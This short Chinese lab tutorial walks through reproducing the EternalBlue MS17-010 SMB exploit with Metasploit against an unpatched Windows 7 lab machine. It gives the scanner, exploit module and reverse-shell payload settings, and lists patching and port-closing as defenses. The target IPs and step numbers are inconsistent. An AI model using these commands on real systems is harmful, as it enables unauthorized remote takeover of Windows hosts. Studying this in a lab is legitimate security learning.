背景介紹
原理:“永恒之藍”的原理主要是掃描所有開放445檔案共享端口的Windows機器,利用Windows系統的SMB漏洞可以擷取系最高權限。
影響範圍:Windows Vista、Win7、Win8、Win XP、Windows server 2003等。
防範措施:及時更新Windows系統更新檔;不要輕易打開陌生的檔案;關閉445、139端口。
環境:
攻擊機:kali IP:192.168.137.44
靶機:win7 IP:192.168.137.190 (開放445端口且沒有打更新檔)
工具:MSF架構
漏洞複現:
nmap對靶機進行掃描

1. 在kali終端打開metasploit
msfconsole
2. 尋找永恒之藍相關掃描子產品
search ms17-010
3. 利用掃描子產品掃描确定漏洞
- 利用smb_ms17_010漏洞掃描子產品,利用它可以确定目标是否存在該漏洞。
use auxiliary/scanner/smb/smb_ms17_010
- 檢視需要填充哪些參數
show options
RHOSTS參數是你即将掃描的網段,當然也可以隻有一個主機IP
- 設定靶機IP位址
set rhosts 192.168.137.190
- 開始掃描
exploit 或 run 都表示開始執行
如果結果中前面有個綠色的加号,則說明可以利用該漏洞
4. 利用攻擊子產品攻擊
- 選擇攻擊子產品
use exploit/windows/smb/ms17_010_eternalblue
- 選擇payload
set payload generic/shell_reverse_tcp
- 設定rhost(靶機IP)
set rhost 192.168.1.103
- 設定lhost(攻擊機IP)
set lhost 192.168.1.105
- 設定監聽端口(預設是4444)
set lport 500
6) 開始攻擊
exploit 或 run
5. 反彈shell
win7檢視端口建立連接配接
netstat -an